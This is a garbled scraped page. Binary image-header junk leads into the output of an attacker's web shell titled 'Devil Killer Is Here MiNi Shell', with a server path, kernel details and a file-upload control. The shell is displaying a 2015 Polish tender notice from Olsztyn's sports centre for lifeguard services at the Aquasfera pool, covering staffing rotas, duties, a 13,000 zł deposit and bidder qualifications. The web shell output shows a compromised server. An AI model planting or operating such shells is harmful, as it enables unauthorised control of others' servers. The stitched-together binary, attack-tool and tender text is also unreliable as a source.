JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20151130/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20151130/323402-N-2015.html

<p class="kh_header"><b>Olsztyn: Świadczenie kompleksowej usługi ratowników wodnych w obiekcie Wodne Centrum Rekreacyjno - Sportowe Aquasfera w Olsztynie od 01.01.2016 r. do 31.12.2016 r</b><br>
<b>Numer ogłoszenia: 323402 - 2015; data zamieszczenia: 30.11.2015</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b>
<!--zamówienia publicznego.</p>-->
<table class="text2">
<tr><td style="border: solid 1px; width:15px black; text-align: center;"><b>V</b></td>
<td>zamówienia publicznego</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>zawarcia umowy ramowej</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>ustanowienia dynamicznego systemu zakupów (DSZ)</td></tr>
</table>


<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Ośrodek Sportu i Rekreacji w Olsztynie , ul. Żołnierska 13 A, 10-558 Olsztyn, woj. warmińsko-mazurskie, tel. 89 5335132, faks 89 5335132.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.osir.olsztyn.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: jednostka organizacyjna jednostki samorządu terytorialnego.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Świadczenie kompleksowej usługi ratowników wodnych w obiekcie Wodne Centrum Rekreacyjno - Sportowe Aquasfera w Olsztynie od 01.01.2016 r. do 31.12.2016 r.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.Przedmiotem zamówienia jest świadczenie kompleksowej usługi pn. Usługi ratowników wodnych-polegającej na zapewnieniu usług ratowników wodnych w obiekcie sportowo-rekreacyjnym pod nazwą Wodne Centrum Rekreacyjno-Sportowe Aquasfera w Olsztynie przy ul. Piłsudskiego 69b od 01.01.2016 r. do 31.12.2016 r. 2. Świadczenie usługi następować będzie zgodnie z obowiązującymi przepisami, a w szczególności: -Ustawą z dnia 8 września 2006 r. o Państwowym Ratownictwie Medycznym (Dz.U. z 2013 r. poz.757, z późn.zm.), -ustawą z dnia 18 sierpnia 2011r. o bezpieczeństwie osób przebywających na obszarach wodnych (Dz.U. z 2011 r. Nr 208, poz. 1240 z późn.zm.), -aktualnym rozporządzeniem Ministra Spraw Wewnętrznych w sprawie minimalnych wymagań dotyczących liczby ratowników wodnych zapewniających stałą kontrolę wyznaczonego obszaru wodnego (Dz.U.2012.108), -rozporządzeniem Ministra Spraw Wewnętrznych w sprawie wymagań dot. wyposażenia wyznaczonych obszarów wodnych w sprzęt ratunkowy i pomocniczy, urządzenia sygnalizacyjne i ostrzegawcze oraz sprzęt medyczny, leki i artykuły sanitarne, -rozporządzeniem Ministra Spraw Wewnętrznych w sprawie sposobu oznakowania i zabezpieczenia obszarów wodnych oraz wzorów znaków zakazu, nakazu oraz znaków informacyjnych i flag (Dz. U. z 2012 r., poz. 286), -Audytem Bezpieczeństwa opracowanych dla Wodnego Centrum Rekreacyjno-Sportowego Aquasfera. 3.Charakterystyka obiektu: Wodne Centrum Rekreacyjno-Sportowe Aquasfera w Olsztynie, położone przy ulicy Marszałka Józefa Piłsudskiego 69b, składające się z części: 1) Rekreacyjno-Sportowej (basenowej), 2) Administracyjno-biurowej. 3) Restauracyjnej 4) Odnowy biologicznej 5) Fitness z siłownią, 6) Handlowej -kiosku, 7) Garażu podziemnego, 8) Powierzchni zewnętrznych (do granic posesji) wraz z placem manewrowym i drogami ewakuacyjnymi. 4. Część WCRS Aquasfera objęta przedmiotem postępowania. Przedmiotem postępowania objęta jest CZĘŚĆ REKREACYJNO-SPORTOWA w skład której wchodzą:1) basen pływacki z pomostem przesuwnym i dnem ruchomym (51,28 x 25 m, gł. 2-2,3 m), 2) basen do rozgrzewki i nauki pływania (25, x 8,5 m gł. 1,0 - 1,3 m), 3) zespół saunowy, 4) zaplecze socjalno-szatniowe, 5) pomieszczenie ratowników, 6) brodzik dla dzieci - o powierzchni 12 m2, głębokość 0,3 - 0,5 m. 7) basen rekreacyjny o powierzchni 288 m2 i zróżnicowanej głębokości 0,75 - 1,30 m wyposażony w następujące atrakcje basenowe: -leżakami do hydromasażu - o poj. 1,5 m3, -leniwa rzeka -1 szt., -Wanny do hydromasażu -3 szt., -parasol wodny - 1 szt., -gejzer wodno-powietrzny -1 szt, -bicz wodny -1 szt., -kaskada -2 szt., -stacja masażu poziomego -3 szt. 8) Zjeżdżalnie z lądowaniem wewnątrz hali - dwururowa zjeżdżalnia z wydzieloną hamownią do lądowania -1 szt. o parametrach: a) Zjeżdżalnia Z- 1: -długość -120,50 m; -średnica -1000,00 mm; -różnica poziomów -10,43 m; -spadek -9,3 %, b) Zjeżdżalnia Z-2 -długość -115,50 m, -średnica -1000 mm, - różnica poziomów -10,43, - spadek -10,5 %. 5. Sposób realizacji usługi. Zamawiający wymaga, aby usługa realizowana była od poniedziałku do niedzieli w następujący sposób: 1) I zmiana:a) Czas usługi: Godz. 5:45 -14:00, Godz. 5:45 - 6:00 - przygotowanie basenów do pacy, Godz. 6:00 -14:00 - zapewnienie bezpieczeństwa na terenie basenu, b) Wymagana obsada ratownicza podczas zmiany: -Basen olimpijski - min. 2 ratowników wodnych, -Basen rozgrzewkowy - min. 1 ratownik wodny, -Basen rekreacyjny + hamownia zjeżdżalnia - min. 3 ratowników wodnych, -Nadzór ratowniczy -1 ratownik wodny - kierownik zmiany pełniący w myśl Audytu Bezpieczeństwa opracowanego dla WCRS Aquasfera oprócz nadzoru i koordynacji funkcję tzw. libero, czyli wchodzi w skład podstawowej załogi pełniącej dyżur na stanowiskach w sytuacjach nadzwyczajnych, w tym akcje ratownicze, zastępowanie nieobecnego na stanowisku ratownika z zastrzeżeniem, że zastępstwo nie może przekroczyć 3 godz. na zmianie i w tym czasie nastąpi uzupełnienie składu wymaganej obsady ratowników. 2) II zmiana: a) Czas usługi: Godz. 14:00 - 22:00; Godz. 14:00 - 21:45 - zapewnienie bezpieczeństwa na terenie basenu, Godz. 21:45 - 22:00 - prace porządkowe na ternie basenu, b) Wymagana obsada ratownicza podczas zmiany: -Basen olimpijski - min. 2 ratowników wodnych, -Basen rozgrzewkowy - min. 1 ratownik wodny, -Basen rekreacyjny + hamownia, zjeżdżalnia - min. 3 ratowników wodnych, -Nadzór ratowniczy - 1 ratownik wodny - kierownik zmiany pełniący w myśl Audytu Bezpieczeństwa opracowanego dla WCRS Aquasfera oprócz nadzoru i koordynacji funkcję tzw. libero, czyli wchodzi w skład podstawowej załogi pełniącej dyżur na stanowiskach w sytuacjach nadzwyczajnych, w tym akcje ratownicze, zastępowanie nieobecnego na stanowisku ratownika z zastrzeżeniem, że zastępstwo nie może przekroczyć 3 godz. na zmianie i w tym czasie nastąpi uzupełnienie składu wymaganej obsady ratowników. 6. Pojęcie określenia ratownik wodny. Przez pojęcie ratownik wodny - rozumie się, zgodnie Art. 2 ust. 5 Ustawy O bezpieczeństwie osób przebywających na obszarach wodnych (Dz. U. nr 208 poz.1240 z 2011 roku), osobę posiadającą wiedzę i umiejętności z zakresu ratownictwa i technik pływackich oraz inne kwalifikacje przydatne w ratownictwie wodnym i spełniającą wymagania określone w art. 13 ust. 1 ustawy z dnia 8 września 2006 r. o Państwowym Ratownictwie Medycznym (Dz.U. z 2013 r. poz. 757, z późn. zm.), zatrudnioną lub pełniącą służbę w podmiocie uprawnionym do wykonywania ratownictwa wodnego lub będącą członkiem tego podmiotu. 7. Obowiązki czuwających ratowników wodnych: a) zapewnienie bezpieczeństwa i porządku osobom przebywającym w obrębie hali basenowej i zapleczu szatniowym - natychmiastowe udzielanie pierwszej pomocy osobom uległym wypadkowi na terenie obiektu WCRS, b) nadzór nad przestrzeganiem regulaminów pływalni, przepisów porządkowych, BHP, ppoż. oraz innych zarządzeń kierownictwa obiektu, c) postępowanie zgodnie z regulaminem służby ratowniczej i procedurami opracowanymi przez kierownictwo służby ratowniczej i zaakceptowanymi przez Zamawiającego, d) pomoc w przygotowywaniu basenu do zajęć szkoleniowych i imprez zleconych w tym: układanie i zbieranie lin torowych, wydawanie i zbierania sprzętu do aerobiku w wodzie, wydawanie sprzętu do nauki pływania, e) utrzymywanie porządku w pomieszczeniu ratowników i wykorzystywanie go wyłącznie do celów służbowych, f) nadzór nad ruchem osób w obrębie hali basenowej, zapleczu natryskowo-szatniowym i na trybunach, g) pomoc w organizacji zajęć grupowych, ścisła współpraca z instruktorami prowadzącymi zajęcia, nadzorowanie wykorzystywania przez ćwiczących urządzeń i sprzętu zgodnie z ich przeznaczeniem, h) obsługa sprzętu basenowego (liny, drabinki, sprzęt sportowy i dydaktyczny), i) kontrolowanie warunków kąpieli (temperatury wody i otoczenia), j) bieżące prowadzenie służby ratowniczej i dokumentowanie prowadzonych działań ratowniczych, zgodnie z Art. 14 i 16 w/w Ustawy O bezpieczeństwie osób przebywających na obszarach wodnych, k) pełnienie dyżurów w jednolitych strojach, jednoznacznie identyfikujących służbę ratowniczą, l) sterowanie oświetleniem i urządzeniami basenowymi (atrakcjami) w celu eliminowania zbędnego zużywania przez użytkowników energii elektrycznej i wody, m) bezzwłoczne zgłaszanie odpowiednim rzemieślnikom - konserwatorom zauważonych uszkodzeń, w szczególności tych, które stwarzają zagrożenie dla użytkowników i których naprawa wymaga odpowiednich kwalifikacji zawodowych, n) ścisła współpraca z obsługą szatni w zakresie właściwego jej wykorzystywania, o) dbanie o stan techniczny sprzętu ratowniczego oraz medycznego będącego na wyposażeniu pływalni, p) zgłaszanie kierownictwu obiektu konieczności uzupełnienia sprzętu ratowniczego i medycznego w zależności od potrzeb i terminów ważności ich użycia, q) wykonywanie innych prac wynikających z zadań i obowiązków ratowników oraz zlecanych przez Kierownictwo WCRS wchodzących w zakres obowiązków ratownika. 8. Szczegółowy zakres obowiązków ratowników i określenie maksymalnej liczby godzin pracy ratowników zawarty jest w załączniku nr 4. 9. Ratownikowi nie wolno naruszać zasad bezpieczeństwa, obowiązujących przepisów i regulaminów, procedur i obowiązków wynikających z umowy, w szczególności: a) opuszczać stanowiska pracy bez zgody przełożonego, b) samowolnie wpuszczać grup na basen. 10. Wykonawca ponosić będzie odpowiedzialność za skutki wynikające z nienależytego wykonywania obowiązków ratowników, w szczególności za : -nieprzestrzegania regulaminów służby ratowniczej, -nieprzestrzeganie przepisów BHP i PPOŻ, -nieprzestrzegania przepisów porządkowych, -nieprzestrzegania regulaminów i zarządzeń obowiązujących w WCRS. 11. Obsługa w trakcie imprez sportowych, imprez okolicznościowych lub podobnych będzie polegać na przygotowaniu obiektu do imprezy w zakresie przygotowania basenu oraz zapewnienia bezpieczeństwa podczas zawodów. Harmonogram pracy i sposób zabezpieczenia imprezy uzgadniany będzie każdorazowo z Zamawiającym. 12. Procedury zabezpieczenia obiektu WCRS w Olsztynie. Przed przystąpieniem do wykonywania zadania wykonawca zobowiązany jest do przygotowania procedur jakimi będzie się posługiwał w trakcie wykonywania usługi. Procedury należy złożyć w siedzibie Zamawiającego po podpisaniu umowy na świadczenie usługi, przed przystąpieniem do wykonywania usługi. W przygotowanym opracowaniu powinny się znaleźć między innymi: a) procedura przygotowania obiektu do pracy w zakresie bezpieczeństwa użytkowników, b) procedura porządkowania sprzętu wokół niecki basenowej po zakończeniu pracy obiektu, c) procedura kontroli atrakcji wodnych, a w szczególności zjeżdżalni rurowej. d) procedura postępowania w razie wypadku i działań powypadkowych obejmujących działania ratownicze i udzielanie pierwszej pomocy, e) procedura alarmowa przy wypadku w różnych częściach Obiektu, f) procedura postępowania w czasie pożaru lub ewakuacji, g) procedura postępowania w przypadku naruszania regulaminu przez użytkowników obiektu, h) opracowanie i wdrożenie zakresu obowiązków ratowników na poszczególnych stanowiskach, i) określenie granic nadzoru przypadających na jednego ratownika, j) określenie i wdrożenie rodzaju oraz sposobu prowadzenie dokumentacji służby ratowniczej oraz jej archiwizacji, zgodnie z Ustawą O bezpieczeństwie osób przebywających na obszarach wodnych, k) określenie i wdrożenie procedur rejestracji i prowadzenia dokumentacji wypadkowej, zgodnie z  Art. 14 ust. 3 Ustawy o bezpieczeństwie osób przebywających na obszarach wodnych, l) procedura przekazania dyżuru (zmiany), m) procedura instruktażu bezpieczeństwa dla grup zorganizowanych, n) procedura włączania i wyłączania atrakcji wodnych, ze szczególnym uwzględnieniem zjeżdżalni rurowej, o) procedura czasowego wyłączania określonych rejonów pływalni, p) procedura udzielania pomocy osobom niepełnosprawnych przy wejściu/wyjściu z basenów. q) Procedura postępowania przy różnego rodzaju zdarzeniach: -Biologiczne lub chemiczne skażenie wody, -Usuniecie użytkownika stwarzającego zagrożenie z niecki basenowej, z obiektu, -Uwięźnięcie użytkownika w rurze zjeżdżalni, -Awarii oświetlenia hali basenowej, -Nieprawidłowej pracy urządzeń atrakcji wodnych, -Czasowego wyłączenia urządzenia lub strefy basenowej, r) Procedura łączności wewnętrznej i zewnętrznej w sytuacjach wypadkowych, s) Procedura postępowania z materiałem biologicznym, potencjalnie zakaźnym. 13. Ilość godzin świadczenia usług przez ratowników stanowi podstawę do wyceny wartości zamówienia. 14. Wszyscy ratownicy powinni posiadać uprawnienia minimum Ratownika Wodnego, oraz aktualne badania epidemiologiczne, własny strój ratownika (tj. koszulka, spodenki). 15. Podmiot zatrudniający ratowników (wykonawca umowy) prowadzi bezpośredni nadzór i jest bezpośrednio odpowiedzialny za całokształt spraw związanych z pracą ratowników, w tym za respektowanie przepisów prawa, zasad bezpieczeństwa, postanowień umowy, regulaminów i procedur.</p>
<p><b>II.1.5)
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
<td><b>przewiduje się udzielenie zamówień uzupełniających</b></td></tr>
</table>                            
</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li>
<li></li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 71.31.72.00-5, 75.25.20.00-7, 92.62.00.00-3.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Rozpoczęcie: 01.01.2016.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 1.Zamawiający żąda wniesienia wadium. 2. Wymagania dotyczące wadium: 3. Ustala się wadium w wysokości   13.000 zł ( trzynaście tysiące złotych). 4. Wadium należy wnieść przed upływem składania ofert  (data i godzina oznaczona w postępowaniu). 5. Wadium może być wnoszone w jednej lub kilku następujących formach: 1) w pieniądzu - potwierdzonym   przelewem na konto OSiR Nr rachunku  60 1030 1218 00000000 9050 5068, 2) Poręczeniach bankowych lub poręczeniach Spółdzielczej Kasy Oszczędnościowo Kredytowej, 3) Gwarancjach bankowych, 4) Gwarancjach ubezpieczeniowych, 5) Poręczeniach udzielonych przez przedmioty, o których mowa w art. 6b ust. 5 pkt. 2 ustawy z dnia 9 listopad 2000 r. O utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz. U. z 2007 Nr. 109 poz. 1158, z późn. zm.)</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Dla uznania, że Wykonawca spełnia warunek posiadania uprawnień, zamawiający żąda by Wykonawca złożył kopię dokumentu stwierdzającego, że uzyskał zgodę Ministra Spraw Wewnętrznych do wykonywania ratownictwa wodnego i w jej myśl jest podmiotem uprawnionym do wykonywania ratownictwa wodnego zgodnie z art. 12 Ustawy z dnia 18.08.2011 r. O bezpieczeństwie osób przebywających na obszarach wodnych Dz. U. z 2011 r. Nr 208, poz. 1240, który stanowi, że Ratownictwo Wodne może wykonywać Wodne Ochotnicze Pogotowie Ratunkowe oraz inne podmioty, jeżeli uzyskały zgodę Ministra Spraw Wewnętrznych, zwane dalej podmiotem uprawnionym do wykonywania ratownictwa wodnego. Ocena nastąpi na podstawie złożonej kopii zezwolenia (zgody) i oświadczenia (załącznik Nr 2 do SIWZ)</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Dla uznania, że wykonawca spełnia warunek posiadania wiedzy i doświadczenia, zamawiający żąda by wykonawca złożył wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie - co najmniej 2 zamówienia w zakresie świadczenia usług związanych z zabezpieczeniem ratownictwa wodnego o wartości minimum 100.000,00 zł brutto każde w aquaparkach, pływalniach lub kąpieliskach. Ocena  warunku nastąpi na podstawie złożonego Wykazu usług z dowodami należytego wykonania lub wykonywania (załącznik Nr 6 do SIWZ) i oświadczenia (załącznik Nr 2 do SIWZ)</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Dla  uznania, że wykonawca spełnia wymieniony warunek, zamawiający żąda by wykonawca wykazał, iż dysponuje lub będzie dysponował osobami, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnymi za świadczenie usług, które będą posiadać uprawnienia ratownika wodnego. Zamawiający żąda wykazu minimum 21 osób, z podaniem nazwiska i imienia ratownika, kwalifikacji zawodowych (stopień, nr uprawnień) wraz z kserokopią aktualnej legitymacji Ratownika lub innym dokumentem potwierdzającym posiadane kwalifikacje i ważnym zaświadczeniem o spełnieniu wymagań art. 13 na podstawie Ustawy z dnia 08.09.2006 r. o Państwowym Ratownictwie Medycznym (Dz. U. z 2013 r. poz.757), planowanej funkcji podczas wykonywania zadania oraz informacją czy posiada aktualne zaświadczenie lekarskie potwierdzające zdolność do pełnienia funkcji ratownika.Ocena warunku nastąpi na podstawie złożonego Wykazu osób (załącznik Nr 5 do SIWZ), oraz  oświadczenia (załącznik Nr 2 do SIWZ)</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Dla  uznania, że wykonawca spełnia wymieniony warunek, zamawiający żąda by wykonawca wykazał, iż dysponuje lub będzie dysponował osobami, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnymi za świadczenie usług, które będą posiadać uprawnienia ratownika wodnego. Zamawiający żąda wykazu minimum 21 osób, z podaniem nazwiska i imienia ratownika, kwalifikacji zawodowych (stopień, nr uprawnień) wraz z kserokopią aktualnej legitymacji Ratownika lub innym dokumentem potwierdzającym posiadane kwalifikacje i ważnym zaświadczeniem o spełnieniu wymagań art. 13 na podstawie Ustawy z dnia 08.09.2006 r. o Państwowym Ratownictwie Medycznym (Dz. U. z 2013 r. poz.757), planowanej funkcji podczas wykonywania zadania oraz informacją czy posiada aktualne zaświadczenie lekarskie potwierdzające zdolność do pełnienia funkcji ratownika.Ocena warunku nastąpi na podstawie złożonego Wykazu osób (załącznik Nr 5 do SIWZ), oraz  oświadczenia (załącznik Nr 2 do SIWZ)</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Dla uznania, że wykonawca spełnia warunek posiadania odpowiedniej sytuacji ekonomicznej i finansowej, zamawiający żąda, by wykonawca wykazał, że posiada opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że Wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności na kwotę minimum 1.500.000 zł. Do oferty należy dołączyć kopię polisy lub inny dokument. Ocena warunku nastąpi na podstawie złożonej kopii polisy lub innego dokumentu i oświadczenia (załącznik Nr 2 do SIWZ)</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">potwierdzenie posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania, w szczególności koncesje, zezwolenia lub licencje;</li>

<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia.</li>

</ul><p>Wykonawca powołujący się przy wykazywaniu spełnienia warunków udziału w postępowaniu, o których mowa w art. 22 ust. 1 pkt 4 ustawy, na zasoby innych podmiotów przedkłada następujące dokumenty dotyczące podmiotów, zasobami których będzie dysponował wykonawca:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
			
<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że inny podmiot jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

